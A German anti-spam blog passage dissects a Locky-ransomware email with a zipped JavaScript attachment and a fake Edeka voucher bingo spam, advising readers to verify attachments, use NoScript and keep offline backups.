Deshalb ist es so wichtig, niemals auf derartige Spam hereinzufallen, sondern sie zu erkennen. Das ist in diesem Fall relativ einfach gewesen:

  1. Man ist angeblich Kunde, wird aber in einer E-Mail nicht persönlich angesprochen.
  2. Es ist völlig unklar, wer der Absender der E-Mail ist. Es gibt keinerlei Angaben für eine eventuelle Rückfrage.
  3. Es ist eine angebliche Mahnung, aber im Text der Mail fehlen sämtliche Angaben zum Gegenstand der Mahnung. Stattdessen soll in die Mail geklickt werden, um zu erfahren, um was es überhaupt geht.
  4. Der Text der Mail strotzt vor beängstigendem Bullshit, der in dieser Form niemals von einem Kaufmann oder einem Rechtsanwalt geschrieben würde.
  5. „Leben Sie wohl!“ als Abschiedsformel bedarf keiner weiteren Kommentierung

Generell sind Dateien, die ohne vorherige Absprache mit E-Mail zugestellt wurden, mit äußerster Vorsicht zu behandeln. E-Mail ist bei Kriminellen so beliebt, weil es sich um einen Weg handelt, jemanden anders Dateien und ausführbaren Code auf die Festplatte zu spielen – und zwar mit beliebig fälschbarem Absender. Auch bei bekannten Absendern niemals eine derartige Datei öffnen, ohne vorher auf einem anderen Weg als über E-Mail (zum Beispiel telefonisch) kurz Rücksprache gehalten zu haben! Antivirus-Programme nützen gar nichts. Ich wiederhole, weil die Werbung und die Computerjournaille ständig das Gegenteil behauptet: Antivirus-Programme nützen gar nichts. Wenn man sich darauf verlässt, sind sie sogar gefährlich. Das beste Antivirus-Programm ist und bleibt das Gehirn.

Budget Reports

Freitag, 5. August 2016

Hey info

Beste Anrede des Tages!

I attached the annual budget reports that you asked me to send to you.

Ich habe dich um gar nichts gebeten. Und wenn ich mit dir kommunizieren würde und du würdest mir halbwegs regelmäßig Dateien senden, die für mich von Bedeutung sind, dann wäre deine E-Mail digital signiert oder du würdest das nicht tun. Es gibt nämlich Kriminelle da draußen, die Schadsoftware als E-Mail-Anhang versenden.

Best regards,
Brandie Chapman

Du mich auch!

Der Anhang der Spam ist ein ZIP-Archiv namens a131e76a27.zip. Es ist 11 KiB groß und enthält…

$ ls -lh a131e76a27.zip 
-rw-rw-r-- 1 elias elias 11K Aug  5 14:50 a131e76a27.zip
$ unzip -l a131e76a27.zip 
Archive:  a131e76a27.zip
  Length      Date    Time    Name
---------  ---------- -----   ----
    77908  2016-08-04 22:08   annual_budget_ c4a8b0d1~.js
---------                     -------
    77908                     1 file
$ _

…exakt eine Datei. Diese ist nicht etwa ein Dokument, sondern ein direkt ausführbares Javascript-Programm für den Windows Script Host. Ein Doppelklick auf diese Datei startet das Programm. Das Programm ist vorsätzlich kryptisch und unverständlich formuliert, um eine Analyse durch Antivirus-Software und durch Menschen zu erschweren. Kein Programmierer würde so programmieren. Es handelt sich um klare Schadsoftware. Nach dem Klick auf das angebliche „Dokument“ steht ein Computer anderer Leute auf dem Tisch.

Obwohl „Locky“, der hier zugestellte Erpressungstrojaner, ein „alter Bekannter“ ist, scheitern zwei Drittel der populären Antivirus-Programme zurzeit daran, diese klare Schadsoftware als Schadsoftware zu erkennen. Wer sich auf den Schutz durch Antivirus-Programme verlassen hat, ist in vielen Fällen wieder einmal verlassen. Natürlich testen auch Kriminelle ihre Machwerke mit den gängigen Antivirus-Programmen und stellen sicher, dass ihre asozialen Nummern ein paar Stunden oder gar Tage lang laufen, denn sie leben davon.

Deshalb ist es so wichtig, niemals einen Mailanhang zu öffnen, wenn dieser nicht vorher explizit über einen anderen Kanal als E-Mail vereinbart wurde. Eine „vertrauenswürdige“ Absenderadresse ist keine Hilfe, denn der Absender einer E-Mail kann beliebig gefälscht werden. Jede E-Mail, die nicht digital signiert ist (und deren digitale Signatur man nicht überprüft hat) ist als E-Mail eines Unbekannten und möglicherweise Kriminellen zu betrachten und zu behandeln. Bei bekannten Absendern immer telefonisch nachfragen, bevor ein Anhang geöffnet wird; Anhänge von Unbekannten niemals öffnen! Und generell gilt: Ein ZIP-, 7z- oder RAR-Archiv als Mailanhang ist eine typische Verpackung für Schadsoftware – wenn sich darin zusätzlich nur eine einzige und relativ kleine Datei befindet, handelt es sich immer um Schadsoftware (oder um die E-Mail eines Vollidioten).

Der beste Schutz vor der Übernahme des eigenen Computers durch Kriminelle ist nicht ein oft wirkungsloses Antivirus-Programm, sondern die Benutzung des Gehirnes. Erfreulicherweise kostet die Hirnnutzung nicht einmal Geld, so dass nichts gegen einen Einsatz spricht. 😉

gammelfleisch@tamagothi.de 500€ Edeka Gutschein für,

Donnerstag, 14. Juli 2016

Zunächst: Edeka hat mit dieser Spam nichts zu tun. Diese Firmierung wird hier nur von jemanden missbraucht, dessen Ansehen bei weitem nicht so gut ist wie das der Marke „Edeka“.

Der Spammer hat es in dieser Spam „versäumt“, die Pfade zu den Grafiken als absolute Pfade anzugeben, so dass die Grafiken nicht geladen werden können, selbst, wenn man seine Mailsoftware dermaßen unsicher konfiguriert, dass das der Standard ist. Warum sollte er sein Skript, bevor er es in hunderttausenden Postfächern Amok laufen lässt, auch mal kurz testen? Er ist ja schließlich ein illegaler und asozialer Spammer, der seine Opfer verachtet.

Hallo nachtwaechter@tamagothi.de,

heute ist Ihr Glückstag. Spielen sie noch heute Bingo und gewinnen Sie einen 500€ EDEKA Gutschein.

Es ist ganz einfach! Sie, wählen Ihre Glückszahl aus und erfahren direkt im Anschluss, ob Sie ein Bingo haben.

[Hier ist ein nicht darstellbares Bild, das verlinkt wurde]

Also warten Sie nicht länger und gehen Sie bald schon kostenfrei einkaufen.

###Impressum###

Zum Abmelden bitte hier klicken

Am besten an dieser Nummer gefällt mir das „Click here“, das gar nicht erst verlinkt wurde; es fügt sich so prächtig in die Impressumsangabe… 😀

Leider steht zu erwarten, dass der Spammer seine peinlichen Fehler in Kürze korrigiert und die gleiche Masche noch einmal fährt. Wenn man auf den Link klickt, gibt es eine geradezu irrsinnige Folge von Javascript-basierten Weiterleitungen, damit auch wirklich sicher ist, dass jedes Opfer dieser Spam Javascript aktiviert hat. Zu guter Letzt landete ich nicht etwa bei „Edeka“, sondern bei einer Umfrage unter Firefox-Benutzern (der User-Agent wird also von den Verbrechern ausgewertet), bei der man anschließend einen Datenstriptease machen kann, um ein iPhone oder einen Amazon-Einkaufsgutschein zu gewinnen.

Benutzer anderer Betriebssysteme (in meinem Fall ist es ein Linux) und anderer Browser werden auf ganz andere Seiten geleitet. Ich bin mir auch ohne die Spur einer weiteren Analyse so gut wie sicher, dass hier anfälligen Betriebssystemen oder Webbrowsern Schadsoftware untergeschoben werden soll.

Wer seinen Browser nicht absichert¹ und/oder veraltete Software verwendet und außerdem in Spams herumklickt, darf sich nicht darüber wundern, wenn er nach einem Klick in eine Spam einen Erpressungstrojaner auf seinem Rechner hat. Statt einen Einkaufsgutschein einzulösen, „darf“ man dann ein paar Tage später bang Banknoten der Europäischen Zentralbank gegen Bitcoin eintauschen und darauf hoffen, dass man auch wirklich wieder an seine Daten, Korrespondenz, Kontakte, E-Mails, Dokumente, Fotos, Videos, Musiksammlung kommt.

Ich rate strikt davon ab, den Erpressern Geld zu geben. Ein solches Signal, dass sich ihr Verbrechen lohnt, ist dumm. Zum Glück geht es auch schlau: Mit einer regelmäßigen Datensicherung beugt man nicht nur Datenverlusten durch technische Defekte und Unfälle vor, sondern trägt auch dazu bei, den kriminellen Sumpf der Erpressung durch Trojaner auszutrocknen, weil die Zahlung eines Lösegeldes nicht erforderlich ist, um wieder an seine Daten zu kommen. Kostenlose Software für diesen Zweck findet sich durch einfachste Benutzung einer Suchmaschine. Selbst technisch unkundige Windows-Nutzer sollten mit einem Programm wie Personal Backup schnell klarkommen – ich empfehle allerdings dringend eine externe Festplatte, die während des normalen Betriebes vom Computer getrennt ist. Wenn ein Erpressungstrojaner nämlich auch auf das Backup zugreifen kann, ist alle Vorsorge umsonst gewesen.

Die Verwendung des Addons NoScript hätte bereits ausgereicht, um schon den ersten Schritt einer Javascript-Weiterleitung fehlschlagen zu lassen. Wenn der Anwender dann nicht so doof ist, dass er Javascript für diese Seite mit einem Klick explizit freischaltet, weil ihm ein Spammer in einer Spam gesagt hat, dass er Bingo spielen und Gutscheine gewinnen kann, ist er vor solchen Angriffen sicher. Es ist keine gute Idee, jedem Menschen in einem anonymisierenden, technischen Medium das Privileg einzuräumen, beliebigen Programmcode im Browser ausführen zu können. Es gibt da draußen nämlich leider ganz viele Gestalten, die vermutlich nur ihre Mutter vermissen würde, wenn es sie nicht gäbe…

Close

⚠️ Kein Adblocker erkannt 🛑

Bitte installieren Sie so schnell wie möglich einen Adblocker für ihren Webbrowser! Sie schützen damit die Ihren Computer vor Schadsoftware, die über Malvertising verteilt wird, und Sie schützen sich selbst vor Ausspähung und intransparentem Datenhandel durch halbseiden bis grenzkriminell vorgehende Wirtschaftsunternehmen. Das ist Grund genug, einen Adblocker zu verwenden. Aber gleichzeitig machen Sie auch Ihre gesamte Interneterfahrung schöner, erfreulicher und schneller. Ich empfehle uBlock Origin.